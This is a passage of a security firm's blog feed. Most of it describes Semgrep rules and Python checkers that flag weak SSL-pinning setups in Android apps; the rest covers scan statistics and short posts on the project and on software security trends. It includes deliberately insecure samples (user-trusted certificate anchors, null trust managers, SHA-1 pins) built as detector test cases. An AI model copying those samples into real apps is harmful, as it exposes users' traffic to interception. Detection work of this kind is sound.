These tools help penetration testers bypass the SSL pinning implementation, but they do not analyze in detail whether the configuration itself contains mistakes.</div><div><br /></div><div>To validate the <b>SSL pinning configuration</b>, it is necessary to analyze both the Network Security Configuration file ("network_security_config.xml") and the Java source code of the application.</div><div><br /></div><div>Thus, the rule has been split as follows:</div><div><ul style="text-align: left;"><li><b>mstg-network-4.1.yaml</b> ⇒ Rule to analyze misconfigurations inside the "network_security_config.xml" file.</li><li><b>mstg-network-4.1.xml</b> ⇒ Example of a vulnerable "network_security_config.xml" file.</li><li><b>mstg-network-4.2.yaml</b> ⇒ Rule to detect security issues inside the Java source code.</li><li><b>mstg-network-4.2.java</b> ⇒ Example of insecure use of pinning inside the Java source code.</li></ul>The rule "<i>mstg-network-4.1.yaml</i>" performs four checks:</div><div><ul style="text-align: left;"><li>It verifies that the pin set has an expiration date.</li><li>It verifies that the pin set has not expired.</li><li>It verifies that a backup pin is present.</li><li>It verifies that the trust anchors do not include user-installed certificates.</li></ul></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">pattern-either:
  # Pin expiration not present
  - patterns:
      - pattern: <pin-set ... />
      - pattern-not: <pin-set expiration="..." />
  # Pin expired
  - patterns:
      - pattern: <pin-set expiration="$X" />
      - metavariable-comparison:
          comparison: strptime($X) < today()
  # Backup pin not present
  - patterns:
      - pattern: <pin-set ... />
      - pattern-not: <pin-set><pin/><pin/></pin-set>
  # Trust anchors contain user certificates
  - patterns:
      - pattern: <trust-anchors>...<certificates src="user" />...</trust-anchors></code></pre>
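As a stand-alone equivalent of the four checks in "mstg-network-4.1.yaml", useful to validate the rule's logic against your own configuration files, here is a Python checker added for this page (it is not part of the project). The two Network Security Configuration files are constructed: the domain is a placeholder, the pin values are not real certificate hashes, and the reference date is passed in as an ISO string so the expiration check is deterministic. The "expiration" attribute is parsed in the "yyyy-MM-dd" format that the Network Security Configuration requires.

```python
import xml.etree.ElementTree as ET
from datetime import date


def check_network_security_config(xml_text, today_iso=None):
    """Return one finding string per problem, mirroring the four checks of
    mstg-network-4.1: missing expiration, expired pin-set, missing backup pin,
    and trust-anchors that accept user-installed certificates."""
    today = date.fromisoformat(today_iso) if today_iso else date.today()
    root = ET.fromstring(xml_text)
    findings = []
    for pin_set in root.iter("pin-set"):
        expiration = pin_set.get("expiration")
        if expiration is None:
            findings.append("pin-set has no expiration attribute")
        elif date.fromisoformat(expiration) < today:   # attribute format is yyyy-MM-dd
            findings.append(f"pin-set expired on {expiration}")
        if len(pin_set.findall("pin")) < 2:            # a single pin means no backup pin
            findings.append("pin-set has no backup pin")
    for anchors in root.iter("trust-anchors"):
        if any(c.get("src") == "user" for c in anchors.findall("certificates")):
            findings.append("trust-anchors accept user-installed certificates")
    return findings


# Constructed, deliberately weak configuration (placeholder pin values).
VULNERABLE_NSC = """\
<network-security-config>
  <domain-config>
    <domain includeSubdomains="true">api.example.com</domain>
    <pin-set expiration="2022-01-01">
      <pin digest="SHA-256">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=</pin>
    </pin-set>
    <trust-anchors>
      <certificates src="system"/>
      <certificates src="user"/>
    </trust-anchors>
  </domain-config>
</network-security-config>
"""

# Same domain with a future expiration, a backup pin and system anchors only.
HARDENED_NSC = """\
<network-security-config>
  <domain-config>
    <domain includeSubdomains="true">api.example.com</domain>
    <pin-set expiration="2030-12-31">
      <pin digest="SHA-256">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=</pin>
      <pin digest="SHA-256">BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=</pin>
    </pin-set>
    <trust-anchors>
      <certificates src="system"/>
    </trust-anchors>
  </domain-config>
</network-security-config>
"""

if __name__ == "__main__":
    for finding in check_network_security_config(VULNERABLE_NSC, "2024-03-06"):
        print(finding)   # three findings: expired pin-set, no backup pin, user trust anchors
    print(check_network_security_config(HARDENED_NSC, "2024-03-06"))  # []
```

Unlike the Semgrep rule, this checker walks the parsed tree, so a pin-set nested anywhere under a domain-config or base-config is examined; run it on the "network_security_config.xml" extracted by Jadx from the APK.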
</div><div><br /></div><div><div>On the Java side, the rule "<i>mstg-network-4.2.yaml</i>" performs four additional checks:</div><div><ul style="text-align: left;"><li>It verifies that the "<i>SSLContext</i>" is not initialized with a null "<i>TrustManager</i>" array, which falls back to the platform default trust store and therefore leaves no custom pinning trust manager in place.</li><li>It verifies that the "<i>TrustManagerFactory</i>" is not initialized with a null "<i>KeyStore</i>", which likewise selects the default system trust store instead of the pinned certificates.</li><li>It verifies that the OkHttp "<i>CertificatePinner</i>" does not use the deprecated SHA-1 hashing function ("<i>sha1/</i>" prefix).</li><li>It verifies that an "<i>HttpsURLConnection</i>" object calls the "connect" method only after the "<i>SSLSocketFactory</i>" has been configured.</li></ul></div></div>
<pre style="line-height: 1.4;"><code class="yaml" style="border-radius: 10px;">pattern-either:
  - pattern: (SSLContext $X).init($P1, null, $P3);
  - pattern: (TrustManagerFactory $X).init(null);
  - patterns:
      - pattern: new CertificatePinner.Builder().add("$D", "$P")
      - metavariable-regex:
          metavariable: $P
          regex: .*(?i)(sha1/).*
  - patterns:
      - pattern: (HttpsURLConnection $X).connect();
      - pattern-not-inside: |
          (HttpsURLConnection $X).setSSLSocketFactory(...);
          ...
          (HttpsURLConnection $X).connect();</code></pre>
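<p>To make the four Java-side checks concrete, here is an added Python example (not the project's rule, and not a substitute for Semgrep's AST matching) that runs a regex approximation of them over two constructed Java snippets: one with all four weaknesses and one hardened counterpart. The variable names, host and pin values are placeholders, and the <code>pattern-not-inside</code> semantics are simplified to "no <code>setSSLSocketFactory</code> call on the same variable earlier in the file".</p>

```python
"""Regex approximation of the mstg-network-4.2 checks over Java source.
Added example, not the project's code; Java samples are constructed."""
import re

# Constructed snippet: null TrustManagers, null KeyStore, SHA-1 pin,
# and connect() before any SSLSocketFactory is configured.
INSECURE_JAVA = """
SSLContext ctx = SSLContext.getInstance("TLS");
ctx.init(null, null, new SecureRandom());
TrustManagerFactory tmf = TrustManagerFactory.getInstance("X509");
tmf.init(null);
CertificatePinner pinner = new CertificatePinner.Builder()
    .add("api.example.test", "sha1/PLACEHOLDER_PIN=")
    .build();
HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
conn.connect();
"""

# Constructed snippet that passes all four checks.
SECURE_JAVA = """
TrustManagerFactory tmf = TrustManagerFactory.getInstance("X509");
tmf.init(keyStore);
SSLContext ctx = SSLContext.getInstance("TLS");
ctx.init(null, tmf.getTrustManagers(), new SecureRandom());
CertificatePinner pinner = new CertificatePinner.Builder()
    .add("api.example.test", "sha256/PLACEHOLDER_PIN=")
    .build();
HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
conn.setSSLSocketFactory(ctx.getSocketFactory());
conn.connect();
"""

# Local variable declarations of the three types the rule cares about.
DECL_RE = re.compile(r"\b(SSLContext|TrustManagerFactory|HttpsURLConnection)\s+(\w+)\s*=")
# CertificatePinner.Builder().add(host, pin) whose pin uses sha1/ (case-insensitive).
SHA1_PIN_RE = re.compile(r'\.add\(\s*"[^"]*"\s*,\s*"([^"]*sha1/[^"]*)"', re.IGNORECASE)


def check_java_pinning(src):
    """Return a list of finding strings for the Java source `src`."""
    findings = []
    types = {name: typ for typ, name in DECL_RE.findall(src)}
    for name, typ in types.items():
        if typ == "SSLContext" and re.search(rf"\b{name}\.init\([^,]*,\s*null\s*,", src):
            findings.append(f"SSLContext {name} initialised with null TrustManagers")
        if typ == "TrustManagerFactory" and re.search(rf"\b{name}\.init\(\s*null\s*\)", src):
            findings.append(f"TrustManagerFactory {name} initialised with null KeyStore")
        if typ == "HttpsURLConnection":
            for m in re.finditer(rf"\b{name}\.connect\(\)", src):
                # Simplified pattern-not-inside: look for an earlier factory setup.
                if f"{name}.setSSLSocketFactory(" not in src[: m.start()]:
                    findings.append(f"HttpsURLConnection {name}.connect() without setSSLSocketFactory")
    for m in SHA1_PIN_RE.finditer(src):
        findings.append(f"certificate pin uses SHA-1: {m.group(1)}")
    return findings


if __name__ == "__main__":
    for name, src in (("insecure", INSECURE_JAVA), ("secure", SECURE_JAVA)):
        print(name, check_java_pinning(src) or "OK")
```

<p>The textual "earlier in the file" heuristic is where a regex scanner and Semgrep diverge: Semgrep's <code>pattern-not-inside</code> requires the <code>setSSLSocketFactory</code> call and the <code>connect()</code> to sit in the same enclosing block, so a factory configured on a different code path would not suppress the finding there.</p>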
<div><br /></div><div><br /></div><h2 style="text-align: left;">Tests and Results</h2><div><div>The project's goal is not to generate a large number of false positives that penetration testers then have to review. Instead, the real goal is to find a balance that <b>minimizes both false positives and false negatives</b>, thereby maximizing the reliability of each rule.</div><div>To test the implemented Semgrep rules, the following workflow was used:</div><div><ol style="text-align: left;"><li>Download an Android application.</li><li>Extract and decompile the code with <i>JADX</i>.</li><li>Upload the source code to a cloud storage.</li><li>Analyze the application source code, one application at a time.</li></ol></div><div><br /></div><div>During the first three phases, we collected <b>280 Android applications</b> from different categories with a very high total number of downloads: <b>more than 111 billion</b>!</div></div><div>The following graph shows the number of applications per category included in the analysis.</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuqkKfeYeKeBbNsfu1Rj981rw_sBdBzgenkjVCd6LyLIN3ivf27ZirNBv6qdu-ABx6l6FWFUGNkT62PDmeNDSf5gC4bU20X-EiczNO_UHLe3rvBFSsJP3uYgltnPHlMXAiYNxp8itVv3ZSu3W9YGWkC1T-NdoVfco-yoh6beVi7zapA1jvK3cXWaMvOpc/s1352/app_categories.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="419" data-original-width="1352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuqkKfeYeKeBbNsfu1Rj981rw_sBdBzgenkjVCd6LyLIN3ivf27ZirNBv6qdu-ABx6l6FWFUGNkT62PDmeNDSf5gC4bU20X-EiczNO_UHLe3rvBFSsJP3uYgltnPHlMXAiYNxp8itVv3ZSu3W9YGWkC1T-NdoVfco-yoh6beVi7zapA1jvK3cXWaMvOpc/s16000/app_categories.png" /></a></div><div><br /></div><div>The results are interesting from a quantitative point of view. 
During the stress test we aimed to verify:</div><div><ul style="text-align: left;"><li>The presence of rules associated with a high number of results, which are potentially false positives.</li><li>The average number of findings per application. This value has to be kept in a reasonable range so that a security expert can read and verify each result.</li><li>The speed of each rule, in order to detect any bottlenecks.</li></ul></div><div>The following graph shows the results of the stress test:</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQWE5pYNQ-qLjUHAlXc-QiYxQqu2BAf6uJFH1n6cj1timOgyXgNzl52X6_n3PZO4zTXO5mL6QhTVE5wPpu4ucQkxQZmxBagHxG1m0pcy70cP_pYADgybs4FpqLbHVv8NV3xYOqSzdiw9sYUv7HFYgsk26C7A6_6ibFT3IKo6_cpMRUekIT0NsOUo2wJ0/s1359/app_results.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="447" data-original-width="1359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQWE5pYNQ-qLjUHAlXc-QiYxQqu2BAf6uJFH1n6cj1timOgyXgNzl52X6_n3PZO4zTXO5mL6QhTVE5wPpu4ucQkxQZmxBagHxG1m0pcy70cP_pYADgybs4FpqLbHVv8NV3xYOqSzdiw9sYUv7HFYgsk26C7A6_6ibFT3IKo6_cpMRUekIT0NsOUo2wJ0/s16000/app_results.png" /></a></div><br /><div><div>Analyzing the results of the scan, it was possible to infer the following information:</div><div><ul style="text-align: left;"><li>Total number of findings: <b>107173</b>.</li><li>Average number of findings per application: <b>382</b>.</li><li>Most impacted categories: <b>storage</b>, <b>code</b>, <b>platform</b>.</li><li>The rule about memory leaks ("MSTG-CODE-8.X") potentially produces a high number of findings.</li></ul></div></div><h2 style="text-align: left;">Future</h2><div><div>The general idea for the future of the project is to keep the rules updated. 
Specifically, the project will increasingly focus on improving the following three aspects.</div><div><br /></div><div><b>The new OWASP MASTG 2.0</b>:</div><div>Currently, the project is aligned with version 1.5 of the OWASP MASTG, but version <b><a href="https://mas.owasp.org/news/">2.0</a></b> is on the horizon and promises to make tests more atomic and consistent. The IMQ Minded Security team is actively working to prepare for this important update by aligning the current rules with the future OWASP MASTG version.</div><div><br /></div><div><b>High impact rules</b>:</div><div>Covering an entire testing guide with a tool is an ambitious project that requires time, effort, and expertise. For this reason, we will continue to release new rules focusing on detecting the presence of high-impact vulnerabilities. Stay tuned and always update the ruleset!</div><div><br /></div><div><b>Generalization of rules</b>:</div><div>There are many different ways to implement the same code, depending on the specific programming language, the desired algorithm, and the programmer's personal preferences. For these reasons, it is difficult to implement rules that cover every specific scenario. The current version of the project focuses on the most standard cases and best practices, but some rules need to be updated to detect various forms of the same vulnerable pattern.</div></div><div><br /></div><div><h2>Talks &amp; Events</h2><div><ul style="text-align: left;"><li><b>11 Sep 2023</b>: OWASP Italy Day</li></ul><div class="separator" style="clear: both; text-align: left;">
<a href="https://github.com/OWASP/www-chapter-italy/blob/96201991fdfef280a67d3b41b85e7715d53115d8/assets/images/Riccardo%20Cardelli%20-%20OWASP%20Italy%20Day%202023%20-%2011th%20Sept%20PoliMi.pdf" style="margin-left: 1em; margin-right: 1em;"><img alt="OWASP Italy Day - Slides" data-original-height="1125" data-original-width="2000" height="261" src="https://blogger.googleusercontent.com/img/a/AVvXsEgSWC3_LYw1zoIE-Vn9Old6dW7lozNDxhrOUPsYOmjXvaBjZqSJCoIH0Vg9dcb1sRLW2b3i1QsH0iT8Gll7znuSzMcGoJWIAsVW_L1u9QJnxDIB6LsCcDGYxg0lrC86PeRVVtBIU905fjn2w-jAdypzz23WvJeYLIGVd5Opl_eCfILARWYwJ03GNscrXbo=w464-h261" width="464" /></a></div><br /><ul style="text-align: left;"><li><b>03 Aug 2023</b>: DevSecCon - YouTube Live</li></ul></div><div class="separator" style="clear: both; text-align: left;"> <iframe allowfullscreen="" class="BLOG_video_class" height="264" src="https://www.youtube.com/embed/ZsZMzGD9-6E" width="482" youtube-src-id="ZsZMzGD9-6E"></iframe></div><br /></div>
<p>Riccardo Cardelli</p><h1>A Cool New Project: Semgrep Rules for Android Apps Security</h1><p>Published: 2023-06-21</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiL6HespqFZ1OGFnsE4OchEw6H3FVjCY0hgeeCzdUpAqd373AeLElvHAcEFIE_lbc6KUSwkSf8ZEW65_r1Eq3R_VFVDFCjr6Boug-p-AITviNgw52nR9gnur2LjCmxaqxTbtlW6Dpb83pH6BDgmPPtaNle6fhCHldOLmYTXFsgZCmK-MTU-Yb0FDNQM72w" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="Android Logo with a key like shape to introduce security." data-original-height="552" data-original-width="984" height="180" src="https://blogger.googleusercontent.com/img/a/AVvXsEiL6HespqFZ1OGFnsE4OchEw6H3FVjCY0hgeeCzdUpAqd373AeLElvHAcEFIE_lbc6KUSwkSf8ZEW65_r1Eq3R_VFVDFCjr6Boug-p-AITviNgw52nR9gnur2LjCmxaqxTbtlW6Dpb83pH6BDgmPPtaNle6fhCHldOLmYTXFsgZCmK-MTU-Yb0FDNQM72w=w320-h180" width="320" /></a></div><p>In today's digital landscape, <b>mobile application security</b> has become a <b><u>paramount concern</u></b>. </p><p>With the increasing number of threats targeting <b><i>Android</i></b> applications and the personal data they store, developers and security professionals alike are seeking robust solutions to fortify their code against potential vulnerabilities. 
</p><p>That is why reducing the time and effort needed to identify mobile security issues has become very important.</p><p>We are excited to introduce our <a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">new project</a>, focused on creating <a href="https://semgrep.dev/" target="_blank">Semgrep</a> rules specifically designed to enhance the security of Android apps.</p><p><b><a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">Semgrep Rules for Android Application Security</a></b></p><p>The project provides a new set of specific rules for the <a href="https://owasp.org/www-project-mobile-app-security/" target="_blank">OWASP Mobile Security Testing Guide (MSTG)</a>, which will help to find security issues using <a href="https://www.gartner.com/en/information-technology/glossary/static-application-security-testing-sast" target="_blank">static code analysis (SAST)</a>.</p><h3 style="text-align: left;">The Project</h3><p>The OWASP Mobile Security Testing Guide (MSTG) is an invaluable resource for assessing the security posture of mobile applications. It provides comprehensive guidelines and best practices to identify and address potential security weaknesses. However, manually conducting these tests can be time-consuming and prone to human error. </p><p><b>This is where this project comes into play. </b></p><p>By creating a set of Semgrep rules based on the OWASP Mobile Security Testing Guide, we aim to automate and streamline the security testing process for Android applications. </p><p>These rules act as a way to shift left in the SDLC of mobile apps, enabling developers and security practitioners to efficiently identify and mitigate vulnerabilities in their code. </p><p>With Semgrep's static analysis capabilities and the knowledge base of the MSTG, we can significantly enhance the effectiveness and efficiency of mobile app security assessments. 
</p><p>Our project bridges the gap between theory and practice, empowering developers to build robust and resilient Android applications while ensuring that security remains a top priority.</p><h3 style="text-align: left;">Status</h3><p>Since the beginning of the project, we have continuously strived to deliver a solution that empowers developers and security practitioners to defend against evolving threats and safeguard user data. </p><p>The current status of the project, showing where it is going to be improved and where a Semgrep version limitation blocks the creation of a useful rule, is <a href="https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/status.md" target="_blank">shown here</a>; every improvement will be reflected there as soon as it is implemented.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi5DdVzmfmrek3mjIbtKgiL0LU_K0vqZ7Z2al25enaw4OQDfpP8TZaGAzrmYSGKsZUIpWanaq6lTi77aCFFBJMucJ0gXiCxJDjYphosnLNWOPFNQoAStlEbEVgmRh5U8KoSWkVYgqQuRgyEWh8wVIM3qkgQASH7ubVUjZXaSCJuMKbeZkeGS-sHI2pFt-s" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" data-original-height="132" data-original-width="771" src="https://blogger.googleusercontent.com/img/a/AVvXsEi5DdVzmfmrek3mjIbtKgiL0LU_K0vqZ7Z2al25enaw4OQDfpP8TZaGAzrmYSGKsZUIpWanaq6lTi77aCFFBJMucJ0gXiCxJDjYphosnLNWOPFNQoAStlEbEVgmRh5U8KoSWkVYgqQuRgyEWh8wVIM3qkgQASH7ubVUjZXaSCJuMKbeZkeGS-sHI2pFt-s=s16000" /></a></div><br /><br /><p><a href="https://github.com/mindedsecurity/semgrep-rules-android-security/blob/main/status.md">Check it out now!</a></p><h3 style="text-align: left;">How to contribute:</h3><p>In future posts we'll give some insight and explain how everyone can contribute to the project; in the meantime, your feedback is absolutely welcome! 
</p><p>We strongly believe in the power of collaboration and community involvement, hence we invite developers, security enthusiasts, and Android app experts to actively contribute to our project through our <a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">GitHub repository</a>. </p><p>By participating in the project, you can contribute new Semgrep rules, suggest improvements to existing rules, report bugs, or even share insights and ideas to enhance the overall effectiveness of our Android app security framework. </p><p>Visit our <a href="https://github.com/mindedsecurity/semgrep-rules-android-security" target="_blank">GitHub repository</a> to explore the project, engage with fellow contributors, and make a meaningful impact in the field of mobile app security. </p><h3 style="text-align: left;">Credits</h3><ul style="text-align: left;"><li><b>Supervisor</b>:<ul><li>Stefano Di Paola (Twitter: <a href="https://twitter.com/WisecWisec" target="_blank">@WisecWisec</a>)</li></ul></li><li><b>Project leader</b>:<ul><li>Riccardo Cardelli (Twitter: <a href="https://twitter.com/gand3lf" target="_blank">@gand3lf</a>)</li></ul></li><li><b>Contributors</b>:<ul><li>Andrea Agnello (GitHub: <a href="https://github.com/andrenoli" target="_blank">@AndreNoli</a>),</li><li>Christian Cotignola (Twitter: <a href="https://twitter.com/b4dsheep" target="_blank">@b4dsheep</a>),</li><li>Giacomo Zorzin (Mastodon: <a href="https://infosec.exchange/@gellge" target="_blank">@gellge</a>),</li><li>Giovanni Fazi (GitHub: <a href="https://github.com/giovifazi" target="_blank">@giovifazi</a>),</li><li>Martino Lessio (Twitter: <a href="https://twitter.com/martinolessio" target="_blank">@Martinolessio</a>),</li><li>Maurizio Siddu (GitHub: <a href="https://github.com/akabe1" target="_blank">@akabe1</a>),</li><li>Michele Di Bonaventura (Twitter: <a href="https://twitter.com/cyberaz0r" target="_blank">@cyberaz0r</a>),</li><li>Michele Tumolo (Twitter: <a href="https://twitter.com/0s0urce" target="_blank">@0s0urce</a>)</li></ul></li></ul><p>Stefano Di Paola</p><h1>20 years of Software Security: threats and defense strategies evolution</h1><p>Published: 2023-03-27</p><p>Software security has come a long way in the past two decades. With the advent of new technologies and a rapidly evolving threat landscape, defending against cyber attacks has become more challenging than ever before. 
We recently presented on the evolution of software security threats and defense strategies at the <a href="https://securitysummit.it/eventi/milano-2023/sessioni/20-anni-di-software-security-l-evoluzione-delle-minacce-e-delle-difese">Security Summit in Milan on 15th March 2023</a>. In this blog post, we'll explore some of the key takeaways from the presentation.<br /><br />In the early 1990s, the Internet was still in its infancy, and most people accessed it through their workstations or personal computers. Security threats were relatively simple, and malware and viruses were typically spread through floppy disks or infected email attachments. As the Internet became more ubiquitous, so did the security threats. In the early 2000s, browser-based attacks became more common, and operating systems became a prime target for cyber criminals.<br /><br />With the rise of mobile devices in the 2010s, new security challenges emerged. Smartphones and tablets became a popular target for attackers, and the proliferation of internet-connected devices made it easier than ever for hackers to find vulnerabilities. The number of devices and users increased rapidly, creating a larger attack surface for hackers to exploit.<br /><br />Fast forward to 2020, and the Internet of things (IoT) and automotive industries are the new frontiers of software security. IoT devices such as home assistants, smart thermostats, and security cameras are often poorly secured and easily hacked. Automotive software is becoming increasingly complex, with trillions of lines of code running on modern cars. The increasing use of artificial intelligence (AI) and machine learning (ML) in software also presents new security risks.<br /><br />The timing for a successful attack has also changed dramatically over the years. In the past, attackers had to rely on users to download and execute malicious software. 
Today, many attacks are automated and can happen in real-time, targeting vulnerable devices as soon as they connect to the Internet.<br /><br />As software becomes more integrated into our lives, the security risks also increase. In the past, a security breach might have resulted in the loss of some data or a temporary disruption in service. Today, a security breach could have much more serious consequences, including the loss of life in the case of critical infrastructure or autonomous vehicles.<br /><br /><b>The evolution of software security approach</b> is as important as the evolution of the software security scenario itself. In the early days of software development, security was not given much importance. But as the importance of technology grew, the security risks also grew, which led to the evolution of the software security approach.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujYp3uktduUv1yzeNIjwAmvNrq9NZhWIclGbPQsfVtJxEcBvT58H7HvZKhEvLdy7fUJ5qJPxLGjVfoeHmxRnF2D9ooP6rGKr7TR2pTQlnUoLwBMwaCrtslQJvcXVo2A2DQbq6NYndGNlTrpt3-IJDlUVluRzvNmoRLX5kW8Y7iz0p55BmfB8ymP_W/s960/Matteo%20Meucci%20-%2020%20years%20of%20Software%20Security%20threats%20and%20defense%20strategies%20evolution%20-%20Security%20Summit%20MI%202023.pptx(2).jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="540" data-original-width="960" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujYp3uktduUv1yzeNIjwAmvNrq9NZhWIclGbPQsfVtJxEcBvT58H7HvZKhEvLdy7fUJ5qJPxLGjVfoeHmxRnF2D9ooP6rGKr7TR2pTQlnUoLwBMwaCrtslQJvcXVo2A2DQbq6NYndGNlTrpt3-IJDlUVluRzvNmoRLX5kW8Y7iz0p55BmfB8ymP_W/w640-h360/Matteo%20Meucci%20-%2020%20years%20of%20Software%20Security%20threats%20and%20defense%20strategies%20evolution%20-%20Security%20Summit%20MI%202023.pptx(2).jpg" width="640" /></a></div><br /><p><br /><br />Let's take a look at the three stages of software 
security approach evolution:<br /><br /><b>See the report as a punishment:</b><br />In the early days of software development, software security was not considered a priority. Most developers focused on creating functional and feature-rich applications without thinking about the security aspects. Security audits were conducted only after the software was developed and ready for deployment. These audits were seen as a punishment, rather than a proactive measure to ensure security. This approach was ineffective and led to many security breaches.<br /><br /><b>Testing solves everything:</b><br />The second stage of software security approach evolution was the belief that testing could solve all security issues. Developers started to incorporate testing tools into the software development process to detect vulnerabilities early on. The testing tools were seen as a panacea for all security issues. While testing tools are useful in identifying vulnerabilities, they are not foolproof. </p><p><br /><b>Fixing! What is fixing? Testing is not enough?</b><br />The third and current stage of software security approach evolution is the belief that fixing vulnerabilities is crucial to ensuring software security. Developers now understand that fixing vulnerabilities is a continuous process that must be carried out throughout the software development lifecycle. Developers have now started to incorporate security measures into the design and development of software to prevent vulnerabilities from being introduced in the first place.<br /><br />Moreover, developers are now also adopting a "shift left" approach to software security, where security is integrated into the software development process from the very beginning. 
Developers are also relying on security tools and techniques such as threat modeling, code reviews, and penetration testing to detect and fix vulnerabilities.</p><p><br /><b>Common mistakes over the last 20 years from our experience.</b><br /><br />One of the biggest mistakes made in the last 20 years is the fault placed solely on developers for security issues. This approach is ineffective and ugly. Developers cannot be solely responsible for security issues as it requires a multi-faceted approach.<br /><br />Another common mistake is the testing methodology. Testing should be integrated into the development process, and not performed separately. If testing is conducted separately, there is a high risk of delivering software that has not been tested adequately.<br /><br />Fixing: what is fixing? Fixing is a crucial aspect of software security. The time taken to remediate security vulnerabilities is often too long. Instant security feedback is necessary in modern software projects. Security must be shared, and data about threats, defenses, vulnerabilities, and attacks must be made public to be effective.<br /><br /><b>Software security is not just one person's responsibility, but everyone's</b>. Security champions are essential in supporting developers and others. They can help to make decisions about when to engage the security team, triage security bugs, and act as the voice of security for a given product or team.<br /><br /><br />To help organizations address these challenges, the Open Worldwide Application Security Project (OWASP) has developed several frameworks, including OWASP Open SAMM and the <b><a href="https://owasp.org/www-project-software-security-5d-framework/">recently launched OWASP Software Security 5D Framework</a></b>.<br /><br />Traditionally, secure software development lifecycle (SDLC) frameworks like Microsoft SDL, BSIMM touchpoint, and OWASP SAMM have been used to assess software security. 
However, these frameworks lack the level of awareness, security team, security standards, and security testing tools needed to address today's challenges. </p><p><a href="https://owasp.org/www-project-software-security-5d-framework/">The OWASP Software Security 5D Framework</a><b> is designed to help companies understand the need to grow in all five dimensions simultaneously: TEAM, AWARENESS, STANDARDS, PROCESSES, and TESTING.</b></p><p> </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDJWeOl2AGaO86c7RMhwI1avEKEt7O7ZOafptJ4kQxgSg6UfrmH-lHVVaTUmR1AbYZau6zLlNRI2DP0CZps0llvr56kdGjvzwow5vj3QMuHWv15dl7AHIGNT_eDeEbTNLyUfWaY4eOKYbI14ot2zerei35tSquQtVRpLXB--k7i18L_loW9hl8G2Ny/s960/Matteo%20Meucci%20-%2020%20years%20of%20Software%20Security%20threats%20and%20defense%20strategies%20evolution%20-%20Security%20Summit%20MI%202023.pptx.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="540" data-original-width="960" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDJWeOl2AGaO86c7RMhwI1avEKEt7O7ZOafptJ4kQxgSg6UfrmH-lHVVaTUmR1AbYZau6zLlNRI2DP0CZps0llvr56kdGjvzwow5vj3QMuHWv15dl7AHIGNT_eDeEbTNLyUfWaY4eOKYbI14ot2zerei35tSquQtVRpLXB--k7i18L_loW9hl8G2Ny/w640-h360/Matteo%20Meucci%20-%2020%20years%20of%20Software%20Security%20threats%20and%20defense%20strategies%20evolution%20-%20Security%20Summit%20MI%202023.pptx.jpg" width="640" /></a></div><br /><br /><p style="text-align: left;">The OWASP 5D framework is more practical and focuses on evaluating the maturity of a software security framework in all five dimensions simultaneously, rather than just one or two. 
The framework helps organizations measure their company culture on software security, enforce trust relationships between their company and clients, demonstrate improvements, and have a vision of how to manage their software security roadmap.</p><p style="text-align: left;"><br />One of the key benefits of the OWASP 5D framework is that it enables organizations to create a software security strategy that takes into account the maturity level of their outsourcers. By doing so, they can ensure that the outsourcer is implementing HTTPS, using OWASP guidelines, and conducting penetration testing as part of the software development lifecycle. Additionally, the OWASP SAMM assessment and the 5D framework are standards that allow organizations to assess their software security maturity level and communicate it to clients and stakeholders effectively.</p><p>In conclusion, the OWASP Software Security 5D Framework helps you to:</p><ul style="text-align: left;"><li>Measure your company culture on SwSec (not your number of vulnerabilities!)</li><li>Enforce the trust relationships between your company and your clients</li><li>Demonstrate your improvements</li><li>Have a vision of how to manage your Software Security roadmap</li></ul><p style="text-align: left;">Everyone in the organization is responsible for software security, and OWASP frameworks like the <a href="https://owasp.org/www-project-software-security-5d-framework/">Software Security 5D Framework</a> and <a href="https://owaspsamm.org/">OWASP SAMM</a> Assessment can help organizations create a software security strategy that addresses the challenges associated with software security today.</p><p style="text-align: left;">Please send an email to: <a href="mailto:SwSec5D@mindedsecurity.com">SwSec5D@mindedsecurity.com</a> to request your copy of the presentation.</p><p>Matteo Meucci</p><h1 style="text-align: left;">OWASP Global AppSec Dublin 2023: WorldWide and Threat Modeling</h1><p>Published: 2023-02-24</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjFLx0cRigZarMDU3cDATxMC-R7AGDiaFphYyupun9tdWOLr2-tIElV-EaI1pNQ05JDy_t87ASsYPXzZmwMCqyIZK37eHnN_QTm8OsknM6ZgEIHuY9ze8QZj9aj_jKtaR0zt2QerKquPHjcEkfwXw7rRt0RhWJBzK_LEv7efkUS10O9WRUmwOBUzv0E1Q" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="" data-original-height="168" data-original-width="300" height="179" 